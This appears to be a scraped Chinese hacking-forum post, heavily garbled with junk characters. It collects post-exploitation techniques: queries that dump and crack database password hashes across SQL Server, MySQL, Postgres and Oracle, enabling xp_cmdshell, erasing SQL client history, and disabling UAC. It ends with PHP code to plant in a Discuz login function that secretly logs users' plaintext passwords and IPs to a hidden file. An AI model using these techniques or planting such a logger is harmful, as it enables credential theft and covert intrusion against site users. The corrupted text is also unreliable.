8 k! N+ j+ {7 n6 Q/ r* ~;antian365.asp;antian365.jpg
4 s/ m- d. O. u: F& h. ?& v4 I M5 p. X& v$ v7 D$ j' l* x$ W
各种类型数据库抓HASH破解最高权限密码!
+ O- i0 A+ d- w& [. G% w1.sql server2000
, m2 l" V: q8 m: c# r" K( ^: oSELECT password from master.dbo.sysxlogins where name='sa'& @: m( ^( V8 f0 D3 d
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341* ?2 {. O5 |+ d0 h2 J8 |1 `
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
; ~* s1 S+ x" L: A# p$ c0 n: v: P* Q! U, y* ?. W( G4 Y% D
0×0100- constant header
3 _7 C( p: F7 d" Q: J& r( a34767D5C- salt
* `- M0 Q& q u* [5 b4 q0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
. D" w, ]& ^% `: q# i2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash! m. T; e' q1 b1 z* a) l
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash! y# @ ^" w G; b
SQL server 2005:-
. o8 T- t: L- Q( {: X8 X: Q0 _SELECT password_hash FROM sys.sql_logins where name='sa'
& o5 w5 b. ]2 ?" `: H0 j* Z, i0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
; I# U; j1 t; w1 u8 r0×0100- constant header! R" t* E j" B" |5 l
993BF231-salt
9 R0 t! ^2 i1 Q% }& p# I* d5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash' {6 l# c3 y+ }( P
crack case sensitive hash in cain, try brute force and dictionary based attacks.
: f) u; f, @- X2 g$ [' T$ D8 `7 f1 I; [4 X. T3 L8 d
update:- following bernardo’s comments:-
( A1 G7 {! `$ ?. t0 ]# duse function fn_varbintohexstr() to cast password in a hex string." S1 d2 ]5 P& T9 a2 z# h
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
7 \" p8 M' Z& s) V5 R
: l2 b& Q! F; ~( v) \- Q! d6 K8 N; Z9 HMYSQL:-; M" Y3 z* J9 G0 B4 x! @$ A
* R1 E6 ~* w& F
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.* s9 v; w0 x: [
: o! ^/ h- E3 g*mysql < 4.1
* m1 M d" R0 N" s9 w; S) ?% H* F3 ^$ Q# G
mysql> SELECT PASSWORD(‘mypass’);+ n3 x$ T- x; I0 ?% Y2 X
+——————–++ m% R& |6 e, |7 p |( ^7 j
| PASSWORD(‘mypass’) |$ w+ W9 P; p4 Q* z) Y# ~
+——————–+& ]4 d7 G# c# R ^, q L6 K' k
| 6f8c114b58f2ce9e |: ^. J! F$ k H
+——————–+
" d: \* q B2 f+ z0 u$ v) q/ f+ u( v& R5 K# G3 {3 h5 Z: J
*mysql >=4.1
+ B' F( |. ` a; Q3 `$ C( H4 i5 o# Q& g' ?# v
mysql> SELECT PASSWORD(‘mypass’);/ F. N- ?2 V. z$ ^
+——————————————-+9 m3 S" e+ p7 s' {/ M" n
| PASSWORD(‘mypass’) |
( r( l+ F% f' d5 k+——————————————-+
Z) J! J7 Y2 e3 c- g| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
2 v$ @# w" W% L& f, B+——————————————-+
+ O+ l' E% C5 s8 x9 F6 L B+ y! \* q K9 k9 J
Select user, password from mysql.user
; m4 v8 I; o p7 J/ wThe hashes can be cracked in ‘cain and abel’
3 z& F. K: b5 c3 x, Y$ j. u+ J$ S, Y9 p; I+ \# m1 u, h
Postgres:-
* }; c* }9 O l9 }4 a: `! r' nPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)* T" R1 r9 `1 F9 L2 k
select usename, passwd from pg_shadow;/ Z* a" I8 X" z
usename | passwd5 q7 n9 J6 t+ P3 N+ z, J& N
——————+————————————-8 I# W m/ t8 Y, W! ^
testuser | md5fabb6d7172aadfda4753bf0507ed4396
9 v! w7 ]) Y& R; O" D' M* b. o: kuse mdcrack to crack these hashes:-0 t9 Y7 m+ M; Y) \* i
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
% Y6 D2 Q7 i9 A: W0 j
) e F, @# J1 \6 W, H& f, G$ A- AOracle:-
, Q1 V9 ]- `& I/ c1 J6 bselect name, password, spare4 from sys.user$( C- o" Z% }% R5 C; F
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
. A( Q; D9 q) o/ V0 Q }' y, F3 u8 s8 ]2 HMore on Oracle later, i am a bit bored….! N/ b. w6 k. _
8 _3 _7 C/ \2 C5 ~
+ [3 i# l/ v& V* u1 s在sql server2005/2008中开启xp_cmdshell
8 ]$ F9 r8 s$ d T. F-- To allow advanced options to be changed.# G) e/ Y7 O7 j! c# n) {# R) F/ v
EXEC sp_configure 'show advanced options', 1! n" o+ ^. m9 ~
GO
7 O \$ c8 q( U3 B+ l-- To update the currently configured value for advanced options.% k* n5 D% ~ V
RECONFIGURE/ d; D0 ?4 j; Z) H
GO
" W- r- _6 r# |/ _6 P4 x-- To enable the feature.1 l; G: }% l: S! a e
EXEC sp_configure 'xp_cmdshell', 18 o% u' f X f( X: T1 I/ I2 U
GO+ r# v, ^: v2 Y- ]" H9 {$ k
-- To update the currently configured value for this feature.
1 w; `! }5 [1 QRECONFIGURE" Y" U' Q- Z& W/ c5 q
GO( w! K( V6 M' D9 k8 ?
SQL 2008 server日志清除,在清楚前一定要备份。+ y' z" |0 p* Y, Z- o l
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
/ X2 M, B9 {$ L. VX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
! s# |+ T8 b; b# z9 a7 w% u. g/ u0 @* \5 c
对于SQL Server 2008以前的版本:
+ Z' W4 [7 M* `8 LSQL Server 2005:
/ m3 r) E0 U' ^5 ~; \9 K删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat5 k* e; [$ E1 k( b1 I
SQL Server 2000:
8 c8 B$ n: V& t3 e" Z) ^. H清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
6 c6 u9 C: e. ~7 w9 ]' G# a
# v9 T( _* b' M8 \本帖最后由 simeon 于 2013-1-3 09:51 编辑2 k9 y' ~7 R% U( r
0 | k* N; `$ S/ b; c! P
- `) Y* |2 s8 owindows 2008 文件权限修改
2 W; F7 f; e% y' J% \) F* d1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2 T) q3 I4 u: h- ?( z6 k# m/ F0 e2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98. U( k/ C0 `7 J2 ?3 }+ k' y3 T, j" ` f) z
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
% p* u( \4 {( B, B3 \5 s" L( d* ]
5 w1 ~. ^( j G! @( {& h9 u+ gWindows Registry Editor Version 5.00
0 o1 m2 u h% Z8 t9 S8 z# ?[HKEY_CLASSES_ROOT\*\shell\runas]. j; n. x# a2 b3 Q. T* U
@="管理员取得所有权"! K3 p% B6 C1 [' b( `, M
"NoWorkingDirectory"=""0 C i3 E* h4 n% h# O0 t
[HKEY_CLASSES_ROOT\*\shell\runas\command]2 P8 `2 p: u' o+ |% _1 a- ]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, x4 `! ~& j+ U5 N/ d5 a2 b6 y"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& w, ]. h5 Z a5 M8 i- x
[HKEY_CLASSES_ROOT\exefile\shell\runas2], r7 o& W k& d0 C0 d7 n4 B
@="管理员取得所有权"! p9 @' g8 @& h6 d6 p6 j
"NoWorkingDirectory"=""
9 }. Y0 Q8 \ ?[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]: k( w) e0 j- h$ u
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
4 `4 g2 {+ G0 `* C* X( b"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
8 T& ? Z$ f3 O: J$ l. |2 Y+ y4 ]9 z8 j5 h; I# n4 n9 W. C
[HKEY_CLASSES_ROOT\Directory\shell\runas]. \* r* l9 D- G: f8 L
@="管理员取得所有权"
! I3 Y2 {. F- |/ w8 s"NoWorkingDirectory"="". y/ k- V6 Q9 \8 x' a
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
* p, D8 Z7 C3 S- S: Y@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"" L6 s+ K2 Y: m1 Z/ H% O
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
) g; p0 b( S6 ]; N4 |) a3 e/ a8 W5 c9 B! m- L1 [( F2 E
9 m; z, P# ?* j* J- c
win7右键“管理员取得所有权”.reg导入
4 t( p5 R0 r& N1 G" `* D7 p% R二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,4 N- ?& P5 V: M8 j
1、C:\Windows这个路径的“notepad.exe”不需要替换
3 o2 F/ h5 c1 e S# Q; t3 O2、C:\Windows\System32这个路径的“notepad.exe”不需要替换# n2 q5 ?# d1 M
3、四个“notepad.exe.mui”不要管
1 c' s' g5 Z* G9 b) f7 {* v+ C$ Q4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和4 ~: W; @9 L9 }& b9 g& l
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”7 O( l0 `4 d% w) {
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
8 s2 N$ q, B( v. t& `替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
: m. ]7 P7 {2 [windows 2008中关闭安全策略:
$ i- h, ^ z% n# o$ h( vreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
) Q: i3 h9 n3 B( M. }3 ?修改uc_client目录下的client.php 在0 L% _; f1 r' E8 o% V
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
$ U6 x; r9 \9 F J: y: ^& r下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
! ?9 \/ w7 v" r+ }5 q你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw% ~; a4 D) P: N5 B! A. E8 L$ W
if(getenv('HTTP_CLIENT_IP')) {9 Y' e/ s* Y7 _
$onlineip = getenv('HTTP_CLIENT_IP');
/ P: B$ @3 W b* Z: C( X} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
8 D! o! o7 B0 l9 P/ A) A. u$onlineip = getenv('HTTP_X_FORWARDED_FOR');
9 K& o8 l/ P4 R9 O% f D} elseif(getenv('REMOTE_ADDR')) {* G" ^% i2 p4 x
$onlineip = getenv('REMOTE_ADDR');
8 \! W( J4 L( ~} else {+ i" L) B# @6 M+ p* a6 b: S
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];- g; f: C8 m) B: v
}
; O- \& z9 n& `. v) R& G $showtime=date("Y-m-d H:i:s");% y5 L/ K/ R% O, H- |, R0 }
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";8 n1 W" K4 b0 p+ Q' |/ g
$handle=fopen('./data/cache/csslog.php','a+');
7 j5 b I# c. ]9 F% D) U* d $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对